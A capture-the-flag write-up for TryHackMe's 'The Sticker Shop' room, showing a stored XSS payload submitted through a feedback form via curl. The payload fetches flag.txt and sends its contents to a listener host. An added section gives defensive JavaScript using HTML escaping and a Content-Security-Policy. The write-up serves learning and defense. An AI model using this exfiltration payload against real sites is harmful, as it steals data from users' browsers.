TryHackMe - The Sticker Shop Writeup

Berat Arslan
2 min read · Nov 30, 2024


‘The Sticker Shop’ is one of the ‘Easy’ difficulty rooms on THM.

We seem to have been given enough clues. Once I’ve done enough exploring, I decide on the path to follow. We get an error when we advance to the page.

It seems to be the only area where we can get interaction.

http://machine-ip:8080/submit_feedback

In this section, we notice that whatever input is given to the textbox, it always returns the same thing in response.

Since we need to somehow read the contents of the flag.txt file and we are faced with an input field, the first thing that comes to my mind is to write a script that will make things easier.

You can do this XSS experiment without using the curl command, but I want to run it from the terminal.

I gather the information I need and create my curl command.

Script -> "><script>fetch('http://127.0.0.1:8080/flag.txt').then(r=>r.text()).then(d=>fetch(`http://tun0-ip:1337/?flag=${d}`))</script>

Command -> curl -k -X POST 'http://machine-ip:8080/submit_feedback' --data-urlencode "feedback=>\"<script>fetch('http://127.0.0.1:8080/flag.txt').then(r=>r.text()).then(d=>fetch('http://tun0-ip:1337/?flag='+d))</script>\""

We prepare our terminals before we start the final steps. After starting a listener with nc, I run the curl command, and look what happens a few seconds later on the listening terminal!

You can decode the resulting flag and then use it.
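
The payload above only runs because the feedback text reaches a reviewer's browser as markup. The following is an added example, not code from the room or from this writeup: a sketch of a review-page renderer that HTML-encodes stored feedback and sends a Content-Security-Policy that refuses inline scripts and cross-origin requests. The names `escapeHtml`, `renderReviewPage`, `REVIEW_PAGE_CSP` and `SAMPLE_FEEDBACK` are hypothetical, and it assumes the application builds the review page server-side from stored feedback.

```javascript
// Added defensive example (not the room's code); all names are hypothetical.
// Encode the characters that let text break out of element or attribute context.
const HTML_ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// Second layer: no inline scripts, and fetch/XHR only to the page's own
// origin, so a request carrying data to another host is refused.
const REVIEW_PAGE_CSP = [
  "default-src 'none'",
  "script-src 'self'",
  "style-src 'self'",
  "connect-src 'self'",
  "base-uri 'none'",
  "form-action 'self'",
].join('; ');

// Build the staff review page from stored feedback entries.
function renderReviewPage(feedbackEntries) {
  const items = feedbackEntries
    .map((text) => `    <li>${escapeHtml(text)}</li>`)
    .join('\n');
  return {
    headers: {
      'Content-Type': 'text/html; charset=utf-8',
      'Content-Security-Policy': REVIEW_PAGE_CSP,
      'X-Content-Type-Options': 'nosniff',
    },
    body: `<!doctype html>\n<html>\n<body>\n  <ul>\n${items}\n  </ul>\n</body>\n</html>\n`,
  };
}

// Sample input: the payload shape from this writeup, placeholder host kept.
const SAMPLE_FEEDBACK = [
  'Great stickers!',
  "\"><script>fetch('http://127.0.0.1:8080/flag.txt').then(r=>r.text())" +
    ".then(d=>fetch('http://tun0-ip:1337/?flag='+d))</script>",
];

const page = renderReviewPage(SAMPLE_FEEDBACK);
console.log(page.headers['Content-Security-Policy']);
console.log(page.body); // the payload appears as inert text inside <li>
```

With the encoding in place the submitted string is displayed as text, and the CSP covers any template that forgets to encode.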

I hope I have not made any spelling mistakes or given any misinformation. Please let me know if you notice any omissions or errors.

For suggestions and questions, you can reach me on LinkedIn & X
